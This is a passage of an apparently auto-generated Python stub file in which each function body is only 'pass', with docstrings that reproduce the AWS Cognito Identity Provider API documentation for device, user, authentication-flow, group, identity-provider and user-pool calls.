:type Username: string
:param Username: [REQUIRED]
The user name.
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
"""
pass
def admin_get_device(DeviceKey=None, UserPoolId=None, Username=None):
"""
Gets the device, as an administrator.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_get_device(
DeviceKey='string',
UserPoolId='string',
Username='string'
)
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type Username: string
:param Username: [REQUIRED]
The user name.
:rtype: dict
:return: {
'Device': {
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
}
}
"""
pass
def admin_get_user(UserPoolId=None, Username=None):
"""
Gets the specified user by user name in a user pool as an administrator. Works on any user.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_get_user(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to get information about the user.
:type Username: string
:param Username: [REQUIRED]
The user name of the user you wish to retrieve.
:rtype: dict
:return: {
'Username': 'string',
'UserAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
}
:returns:
UNCONFIRMED - User has been created but not confirmed.
CONFIRMED - User has been confirmed.
ARCHIVED - User is no longer active.
COMPROMISED - User is disabled due to a potential security threat.
UNKNOWN - User status is not known.
"""
pass
def admin_initiate_auth(UserPoolId=None, ClientId=None, AuthFlow=None, AuthParameters=None, ClientMetadata=None):
"""
Initiates the authentication flow, as an administrator.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_initiate_auth(
UserPoolId='string',
ClientId='string',
AuthFlow='USER_SRP_AUTH'|'REFRESH_TOKEN_AUTH'|'REFRESH_TOKEN'|'CUSTOM_AUTH'|'ADMIN_NO_SRP_AUTH',
AuthParameters={
'string': 'string'
},
ClientMetadata={
'string': 'string'
}
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The ID of the Amazon Cognito user pool.
:type ClientId: string
:param ClientId: [REQUIRED]
The app client ID.
:type AuthFlow: string
:param AuthFlow: [REQUIRED]
The authentication flow for this call to execute. The API action will depend on this value. For example:
REFRESH_TOKEN_AUTH will take in a valid refresh token and return new tokens.
USER_SRP_AUTH will take in USERNAME and SRPA and return the SRP variables to be used for next challenge execution.
Valid values include:
USER_SRP_AUTH : Authentication flow for the Secure Remote Password (SRP) protocol.
REFRESH_TOKEN_AUTH /REFRESH_TOKEN : Authentication flow for refreshing the access token and ID token by supplying a valid refresh token.
CUSTOM_AUTH : Custom authentication flow.
ADMIN_NO_SRP_AUTH : Non-SRP authentication flow; you can pass in the USERNAME and PASSWORD directly if the flow is enabled for calling the app client.
:type AuthParameters: dict
:param AuthParameters: The authentication parameters. These are inputs corresponding to the AuthFlow that you are invoking. The required values depend on the value of AuthFlow :
For USER_SRP_AUTH : USERNAME (required), SRPA (required), SECRET_HASH (required if the app client is configured with a client secret), DEVICE_KEY
For REFRESH_TOKEN_AUTH/REFRESH_TOKEN : USERNAME (required), SECRET_HASH (required if the app client is configured with a client secret), REFRESH_TOKEN (required), DEVICE_KEY
For ADMIN_NO_SRP_AUTH : USERNAME (required), SECRET_HASH (if app client is configured with client secret), PASSWORD (required), DEVICE_KEY
For CUSTOM_AUTH : USERNAME (required), SECRET_HASH (if app client is configured with client secret), DEVICE_KEY
(string) --
(string) --
:type ClientMetadata: dict
:param ClientMetadata: This is a random key-value pair map which can contain any key and will be passed to your PreAuthentication Lambda trigger as-is. It can be used to implement additional validations around authentication.
(string) --
(string) --
:rtype: dict
:return: {
'ChallengeName': 'SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
:returns:
SMS_MFA : Next challenge is to supply an SMS_MFA_CODE , delivered via SMS.
PASSWORD_VERIFIER : Next challenge is to supply PASSWORD_CLAIM_SIGNATURE , PASSWORD_CLAIM_SECRET_BLOCK , and TIMESTAMP after the client-side SRP calculations.
CUSTOM_CHALLENGE : This is returned if your custom authentication flow determines that the user should pass another challenge before tokens are issued.
DEVICE_SRP_AUTH : If device tracking was enabled on your user pool and the previous challenges were passed, this challenge is returned so that Amazon Cognito can start tracking this device.
DEVICE_PASSWORD_VERIFIER : Similar to PASSWORD_VERIFIER , but for devices only.
ADMIN_NO_SRP_AUTH : This is returned if you need to authenticate with USERNAME and PASSWORD directly. An app client must be enabled to use this flow.
NEW_PASSWORD_REQUIRED : For users which are required to change their passwords after successful first login. This challenge should be passed with NEW_PASSWORD and any other required attributes.
"""
pass
def admin_list_devices(UserPoolId=None, Username=None, Limit=None, PaginationToken=None):
"""
Lists devices, as an administrator.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_list_devices(
UserPoolId='string',
Username='string',
Limit=123,
PaginationToken='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type Username: string
:param Username: [REQUIRED]
The user name.
:type Limit: integer
:param Limit: The limit of the devices request.
:type PaginationToken: string
:param PaginationToken: The pagination token.
:rtype: dict
:return: {
'Devices': [
{
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
},
],
'PaginationToken': 'string'
}
"""
pass
def admin_list_groups_for_user(Username=None, UserPoolId=None, Limit=None, NextToken=None):
"""
Lists the groups that the user belongs to.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_list_groups_for_user(
Username='string',
UserPoolId='string',
Limit=123,
NextToken='string'
)
:type Username: string
:param Username: [REQUIRED]
The username for the user.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type Limit: integer
:param Limit: The limit of the request to list groups.
:type NextToken: string
:param NextToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:return: {
'Groups': [
{
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
"""
pass
def admin_remove_user_from_group(UserPoolId=None, Username=None, GroupName=None):
"""
Removes the specified user from the specified group.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_remove_user_from_group(
UserPoolId='string',
Username='string',
GroupName='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type Username: string
:param Username: [REQUIRED]
The username for the user.
:type GroupName: string
:param GroupName: [REQUIRED]
The group name.
"""
pass
def admin_reset_user_password(UserPoolId=None, Username=None):
"""
Resets the specified user's password in a user pool as an administrator. Works on any user.
When a developer calls this API, the current password is invalidated, so it must be changed. If a user tries to sign in after the API is called, the app will get a PasswordResetRequiredException exception back and should direct the user down the flow to reset the password, which is the same as the forgot password flow. In addition, if the user pool has phone verification selected and a verified phone number exists for the user, or if email verification is selected and a verified email exists for the user, calling this API will also result in sending a message to the end user with the code to change their password.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_reset_user_password(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to reset the user's password.
:type Username: string
:param Username: [REQUIRED]
The user name of the user whose password you wish to reset.
:rtype: dict
:return: {}
"""
pass
def admin_respond_to_auth_challenge(UserPoolId=None, ClientId=None, ChallengeName=None, ChallengeResponses=None, Session=None):
"""
Responds to an authentication challenge, as an administrator.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_respond_to_auth_challenge(
UserPoolId='string',
ClientId='string',
ChallengeName='SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
ChallengeResponses={
'string': 'string'
},
Session='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The ID of the Amazon Cognito user pool.
:type ClientId: string
:param ClientId: [REQUIRED]
The app client ID.
:type ChallengeName: string
:param ChallengeName: [REQUIRED]
The challenge name. For more information, see AdminInitiateAuth .
:type ChallengeResponses: dict
:param ChallengeResponses: The challenge responses. These are inputs corresponding to the value of ChallengeName , for example:
SMS_MFA : SMS_MFA_CODE , USERNAME , SECRET_HASH (if app client is configured with client secret).
PASSWORD_VERIFIER : PASSWORD_CLAIM_SIGNATURE , PASSWORD_CLAIM_SECRET_BLOCK , TIMESTAMP , USERNAME , SECRET_HASH (if app client is configured with client secret).
ADMIN_NO_SRP_AUTH : PASSWORD , USERNAME , SECRET_HASH (if app client is configured with client secret).
NEW_PASSWORD_REQUIRED : NEW_PASSWORD , any other required attributes, USERNAME , SECRET_HASH (if app client is configured with client secret).
The value of the USERNAME attribute must be the user's actual username, not an alias (such as email address or phone number). To make this easier, the AdminInitiateAuth response includes the actual username value in the USERNAMEUSER_ID_FOR_SRP attribute, even if you specified an alias in your call to AdminInitiateAuth .
(string) --
(string) --
:type Session: string
:param Session: The session which should be passed both ways in challenge-response calls to the service. If InitiateAuth or RespondToAuthChallenge API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next RespondToAuthChallenge API call.
:rtype: dict
:return: {
'ChallengeName': 'SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
:returns:
(string) --
(string) --
"""
pass
def admin_set_user_settings(UserPoolId=None, Username=None, MFAOptions=None):
"""
Sets all the user settings for a specified user name. Works on any user.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_set_user_settings(
UserPoolId='string',
Username='string',
MFAOptions=[
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to set the user's settings, such as MFA options.
:type Username: string
:param Username: [REQUIRED]
The user name of the user for whom you wish to set user settings.
:type MFAOptions: list
:param MFAOptions: [REQUIRED]
Specifies the options for MFA (e.g., email or phone number).
(dict) --Specifies the different settings for multi-factor authentication (MFA).
DeliveryMedium (string) --The delivery medium (email message or SMS message) to send the MFA code.
AttributeName (string) --The attribute name of the MFA option type.
:rtype: dict
:return: {}
"""
pass
def admin_update_device_status(UserPoolId=None, Username=None, DeviceKey=None, DeviceRememberedStatus=None):
"""
Updates the device status as an administrator.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_update_device_status(
UserPoolId='string',
Username='string',
DeviceKey='string',
DeviceRememberedStatus='remembered'|'not_remembered'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type Username: string
:param Username: [REQUIRED]
The user name.
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
:type DeviceRememberedStatus: string
:param DeviceRememberedStatus: The status indicating whether a device has been remembered or not.
:rtype: dict
:return: {}
"""
pass
def admin_update_user_attributes(UserPoolId=None, Username=None, UserAttributes=None):
"""
Updates the specified user's attributes, including developer attributes, as an administrator. Works on any user.
For custom attributes, you must prepend the custom: prefix to the attribute name.
In addition to updating user attributes, this API can also be used to mark phone and email as verified.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_update_user_attributes(
UserPoolId='string',
Username='string',
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to update user attributes.
:type Username: string
:param Username: [REQUIRED]
The user name of the user for whom you want to update user attributes.
:type UserAttributes: list
:param UserAttributes: [REQUIRED]
An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the custom: prefix to the attribute name.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:rtype: dict
:return: {}
"""
pass
def admin_user_global_sign_out(UserPoolId=None, Username=None):
"""
Signs out users from all devices, as an administrator.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.admin_user_global_sign_out(
UserPoolId='string',
Username='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type Username: string
:param Username: [REQUIRED]
The user name.
:rtype: dict
:return: {}
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def change_password(PreviousPassword=None, ProposedPassword=None, AccessToken=None):
"""
Changes the password for a specified user in a user pool.
See also: AWS API Documentation
:example: response = client.change_password(
PreviousPassword='string',
ProposedPassword='string',
AccessToken='string'
)
:type PreviousPassword: string
:param PreviousPassword: [REQUIRED]
The old password in the change password request.
:type ProposedPassword: string
:param ProposedPassword: [REQUIRED]
The new password in the change password request.
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token in the change password request.
:rtype: dict
:return: {}
"""
pass
def confirm_device(AccessToken=None, DeviceKey=None, DeviceSecretVerifierConfig=None, DeviceName=None):
"""
Confirms tracking of the device. This API call is the call that begins device tracking.
See also: AWS API Documentation
:example: response = client.confirm_device(
AccessToken='string',
DeviceKey='string',
DeviceSecretVerifierConfig={
'PasswordVerifier': 'string',
'Salt': 'string'
},
DeviceName='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token.
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
:type DeviceSecretVerifierConfig: dict
:param DeviceSecretVerifierConfig: The configuration of the device secret verifier.
PasswordVerifier (string) --The password verifier.
Salt (string) --The salt.
:type DeviceName: string
:param DeviceName: The device name.
:rtype: dict
:return: {
'UserConfirmationNecessary': True|False
}
"""
pass
def confirm_forgot_password(ClientId=None, SecretHash=None, Username=None, ConfirmationCode=None, Password=None):
"""
Allows a user to enter a confirmation code to reset a forgotten password.
See also: AWS API Documentation
:example: response = client.confirm_forgot_password(
ClientId='string',
SecretHash='string',
Username='string',
ConfirmationCode='string',
Password='string'
)
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: [REQUIRED]
The user name of the user for whom you want to enter a code to retrieve a forgotten password.
:type ConfirmationCode: string
:param ConfirmationCode: [REQUIRED]
The confirmation code sent by a user's request to retrieve a forgotten password. For more information, see ForgotPassword
:type Password: string
:param Password: [REQUIRED]
The password sent by a user's request to retrieve a forgotten password.
:rtype: dict
:return: {}
"""
pass
def confirm_sign_up(ClientId=None, SecretHash=None, Username=None, ConfirmationCode=None, ForceAliasCreation=None):
"""
Confirms registration of a user and handles the existing alias from a previous user.
See also: AWS API Documentation
:example: response = client.confirm_sign_up(
ClientId='string',
SecretHash='string',
Username='string',
ConfirmationCode='string',
ForceAliasCreation=True|False
)
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: [REQUIRED]
The user name of the user whose registration you wish to confirm.
:type ConfirmationCode: string
:param ConfirmationCode: [REQUIRED]
The confirmation code sent by a user's request to confirm registration.
:type ForceAliasCreation: boolean
:param ForceAliasCreation: Boolean to be specified to force user confirmation irrespective of existing alias. By default set to False . If this parameter is set to True and the phone number/email used for sign up confirmation already exists as an alias with a different user, the API call will migrate the alias from the previous user to the newly created user being confirmed. If set to False , the API will throw an AliasExistsException error.
:rtype: dict
:return: {}
"""
pass
def create_group(GroupName=None, UserPoolId=None, Description=None, RoleArn=None, Precedence=None):
"""
Creates a new group in the specified user pool.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.create_group(
GroupName='string',
UserPoolId='string',
Description='string',
RoleArn='string',
Precedence=123
)
:type GroupName: string
:param GroupName: [REQUIRED]
The name of the group. Must be unique.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type Description: string
:param Description: A string containing the description of the group.
:type RoleArn: string
:param RoleArn: The role ARN for the group.
:type Precedence: integer
:param Precedence: A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. Zero is the highest precedence value. Groups with lower Precedence values take precedence over groups with higher or null Precedence values. If a user belongs to two or more groups, it is the group with the lowest precedence value whose role ARN will be used in the cognito:roles and cognito:preferred_role claims in the user's tokens.
Two groups can have the same Precedence value. If this happens, neither group takes precedence over the other. If two groups with the same Precedence have the same role ARN, that role is used in the cognito:preferred_role claim in tokens for users in each group. If the two groups have different role ARNs, the cognito:preferred_role claim is not set in users' tokens.
The default Precedence value is null.
:rtype: dict
:return: {
'Group': {
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
"""
pass
def create_identity_provider(UserPoolId=None, ProviderName=None, ProviderType=None, ProviderDetails=None, AttributeMapping=None, IdpIdentifiers=None):
"""
Creates an identity provider for a user pool.
See also: AWS API Documentation
:example: response = client.create_identity_provider(
UserPoolId='string',
ProviderName='string',
ProviderType='SAML',
ProviderDetails={
'string': 'string'
},
AttributeMapping={
'string': 'string'
},
IdpIdentifiers=[
'string',
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type ProviderName: string
:param ProviderName: [REQUIRED]
The identity provider name.
:type ProviderType: string
:param ProviderType: [REQUIRED]
The identity provider type.
:type ProviderDetails: dict
:param ProviderDetails: [REQUIRED]
The identity provider details, such as MetadataURL and MetadataFile .
(string) --
(string) --
:type AttributeMapping: dict
:param AttributeMapping: A mapping of identity provider attributes to standard and custom user pool attributes.
(string) --
(string) --
:type IdpIdentifiers: list
:param IdpIdentifiers: A list of identity provider identifiers.
(string) --
:rtype: dict
:return: {
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
:returns:
(string) --
(string) --
"""
pass
def create_user_import_job(JobName=None, UserPoolId=None, CloudWatchLogsRoleArn=None):
"""
Creates the user import job.
See also: AWS API Documentation
:example: response = client.create_user_import_job(
JobName='string',
UserPoolId='string',
CloudWatchLogsRoleArn='string'
)
:type JobName: string
:param JobName: [REQUIRED]
The job name for the user import job.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are being imported into.
:type CloudWatchLogsRoleArn: string
:param CloudWatchLogsRoleArn: [REQUIRED]
The role ARN for the Amazon CloudWatch Logging role for the user import job.
:rtype: dict
:return: {
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
:returns:
Created - The job was created but not started.
Pending - A transition state. You have started the job, but it has not begun importing users yet.
InProgress - The job has started, and users are being imported.
Stopping - You have stopped the job, but the job has not stopped importing users yet.
Stopped - You have stopped the job, and the job has stopped importing users.
Succeeded - The job has completed successfully.
Failed - The job has stopped due to an error.
Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
"""
pass
def create_user_pool(PoolName=None, Policies=None, LambdaConfig=None, AutoVerifiedAttributes=None, AliasAttributes=None, SmsVerificationMessage=None, EmailVerificationMessage=None, EmailVerificationSubject=None, SmsAuthenticationMessage=None, MfaConfiguration=None, DeviceConfiguration=None, EmailConfiguration=None, SmsConfiguration=None, UserPoolTags=None, AdminCreateUserConfig=None, Schema=None):
"""
Creates a new Amazon Cognito user pool and sets the password policy for the pool.
See also: AWS API Documentation
:example: response = client.create_user_pool(
PoolName='string',
Policies={
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
LambdaConfig={
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string'
},
AutoVerifiedAttributes=[
'phone_number'|'email',
],
AliasAttributes=[
'phone_number'|'email'|'preferred_username',
],
SmsVerificationMessage='string',
EmailVerificationMessage='string',
EmailVerificationSubject='string',
SmsAuthenticationMessage='string',
MfaConfiguration='OFF'|'ON'|'OPTIONAL',
DeviceConfiguration={
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
EmailConfiguration={
'SourceArn': 'string',
'ReplyToEmailAddress': 'string'
},
SmsConfiguration={
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
UserPoolTags={
'string': 'string'
},
AdminCreateUserConfig={
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
Schema=[
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
]
)
:type PoolName: string
:param PoolName: [REQUIRED]
A string used to name the user pool.
:type Policies: dict
:param Policies: The policies associated with the new user pool.
PasswordPolicy (dict) --A container for information about the user pool password policy.
MinimumLength (integer) --The minimum length of the password policy that you have set. Cannot be less than 6.
RequireUppercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
RequireLowercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
RequireNumbers (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
RequireSymbols (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
:type LambdaConfig: dict
:param LambdaConfig: The Lambda trigger configuration information for the new user pool.
PreSignUp (string) --A pre-registration AWS Lambda trigger.
CustomMessage (string) --A custom Message AWS Lambda trigger.
PostConfirmation (string) --A post-confirmation AWS Lambda trigger.
PreAuthentication (string) --A pre-authentication AWS Lambda trigger.
PostAuthentication (string) --A post-authentication AWS Lambda trigger.
DefineAuthChallenge (string) --Defines the authentication challenge.
CreateAuthChallenge (string) --Creates an authentication challenge.
VerifyAuthChallengeResponse (string) --Verifies the authentication challenge response.
:type AutoVerifiedAttributes: list
:param AutoVerifiedAttributes: The attributes to be auto-verified. Possible values: email , phone_number .
(string) --
:type AliasAttributes: list
:param AliasAttributes: Attributes supported as an alias for this user pool. Possible values: phone_number , email , or preferred_username .
(string) --
:type SmsVerificationMessage: string
:param SmsVerificationMessage: A string representing the SMS verification message.
:type EmailVerificationMessage: string
:param EmailVerificationMessage: A string representing the email verification message.
:type EmailVerificationSubject: string
:param EmailVerificationSubject: A string representing the email verification subject.
:type SmsAuthenticationMessage: string
:param SmsAuthenticationMessage: A string representing the SMS authentication message.
:type MfaConfiguration: string
:param MfaConfiguration: Specifies MFA configuration details.
:type DeviceConfiguration: dict
:param DeviceConfiguration: The device configuration.
ChallengeRequiredOnNewDevice (boolean) --Indicates whether a challenge is required on a new device. Only applicable to a new device.
DeviceOnlyRememberedOnUserPrompt (boolean) --If true, a device is only remembered on user prompt.
:type EmailConfiguration: dict
:param EmailConfiguration: The email configuration.
SourceArn (string) --The Amazon Resource Name (ARN) of the email source.
ReplyToEmailAddress (string) --The REPLY-TO email address.
:type SmsConfiguration: dict
:param SmsConfiguration: The SMS configuration.
SnsCallerArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
ExternalId (string) --The external ID.
:type UserPoolTags: dict
:param UserPoolTags: The cost allocation tags for the user pool. For more information, see Adding Cost Allocation Tags to Your User Pool
(string) --
(string) --
:type AdminCreateUserConfig: dict
:param AdminCreateUserConfig: The configuration for AdminCreateUser requests.
AllowAdminCreateUserOnly (boolean) --Set to True if only the administrator is allowed to create user profiles. Set to False if users can sign themselves up via an app.
UnusedAccountValidityDays (integer) --The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call AdminCreateUser again, specifying 'RESEND' for the MessageAction parameter. The default value for this parameter is 7.
InviteMessageTemplate (dict) --The message template to be used for the welcome message to new users.
SMSMessage (string) --The message template for SMS messages.
EmailMessage (string) --The message template for email messages.
EmailSubject (string) --The subject line for email messages.
:type Schema: list
:param Schema: An array of schema attributes for the new user pool. These attributes can be standard or custom attributes.
(dict) --Contains information about the schema attribute.
Name (string) --A schema attribute of the name type.
AttributeDataType (string) --The attribute data type.
DeveloperOnlyAttribute (boolean) --Specifies whether the attribute type is developer only.
Mutable (boolean) --Specifies whether the attribute can be changed once it has been created.
Required (boolean) --Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
NumberAttributeConstraints (dict) --Specifies the constraints for an attribute of the number type.
MinValue (string) --The minimum value of an attribute that is of the number data type.
MaxValue (string) --The maximum value of an attribute that is of the number data type.
StringAttributeConstraints (dict) --Specifies the constraints for an attribute of the string type.
MinLength (string) --The minimum length of an attribute value of the string type.
MaxLength (string) --The maximum length of an attribute value of the string type.
:rtype: dict
:return: {
'UserPool': {
'Id': 'string',
'Name': 'string',
'Policies': {
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
'LambdaConfig': {
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string'
},
'Status': 'Enabled'|'Disabled',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'SchemaAttributes': [
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
],
'AutoVerifiedAttributes': [
'phone_number'|'email',
],
'AliasAttributes': [
'phone_number'|'email'|'preferred_username',
],
'SmsVerificationMessage': 'string',
'EmailVerificationMessage': 'string',
'EmailVerificationSubject': 'string',
'SmsAuthenticationMessage': 'string',
'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL',
'DeviceConfiguration': {
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
'EstimatedNumberOfUsers': 123,
'EmailConfiguration': {
'SourceArn': 'string',
'ReplyToEmailAddress': 'string'
},
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
'UserPoolTags': {
'string': 'string'
},
'SmsConfigurationFailure': 'string',
'EmailConfigurationFailure': 'string',
'AdminCreateUserConfig': {
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
}
}
}
:returns:
(string) --
"""
pass
